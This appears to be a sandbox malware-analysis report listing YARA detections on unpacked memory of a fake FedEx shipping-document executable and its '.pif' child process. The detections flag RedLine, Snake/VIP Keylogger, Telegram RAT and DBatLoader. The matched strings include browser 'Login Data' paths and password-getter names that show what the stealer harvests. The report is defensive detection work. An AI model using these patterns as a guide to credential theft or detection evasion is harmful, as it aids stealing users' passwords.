14.1.hzwdvhxM.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.2.hzwdvhxM.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.hzwdvhxM.pif.2c440000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.2c440000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.2c440000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.1.hzwdvhxM.pif.438038.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.hzwdvhxM.pif.2c440000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
7.1.hzwdvhxM.pif.438038.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.hzwdvhxM.pif.2c440000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.2c440000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
12.2.hzwdvhxM.pif.4da6c8.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.hzwdvhxM.pif.29421216.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.29421216.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.29421216.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.hzwdvhxM.pif.29421216.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.29421216.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.29421216.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
14.2.hzwdvhxM.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.1.hzwdvhxM.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.3.hzwdvhxM.pif.23e4cb50.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.3.hzwdvhxM.pif.23e4cb50.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.3.hzwdvhxM.pif.23e4cb50.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2d50000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.259d02f6.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.259d02f6.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.259d02f6.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.3.hzwdvhxM.pif.23e4cb50.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.228b218.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.2.hzwdvhxM.pif.2bdf0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2d540000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2d540000.7.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2d540000.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2cee0f20.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2cee0f20.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2cee0f20.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2cee0f20.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2cee0f20.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2cee0f20.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
7.2.hzwdvhxM.pif.2bdf0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.2bdf0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.hzwdvhxM.pif.2bdf0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2d540000.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2d540000.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.294202f6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.294202f6.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.294202f6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.3.hzwdvhxM.pif.23e4cb50.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
14.2.hzwdvhxM.pif.2cee0000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.2bdf0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2d540000.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
12.2.hzwdvhxM.pif.259d02f6.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.294202f6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
12.3.hzwdvhxM.pif.23e4cb50.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
14.2.hzwdvhxM.pif.2cee0000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2cee0000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.259d02f6.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.294202f6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.259d02f6.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
7.2.hzwdvhxM.pif.2bdf0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
14.2.hzwdvhxM.pif.2cee0000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
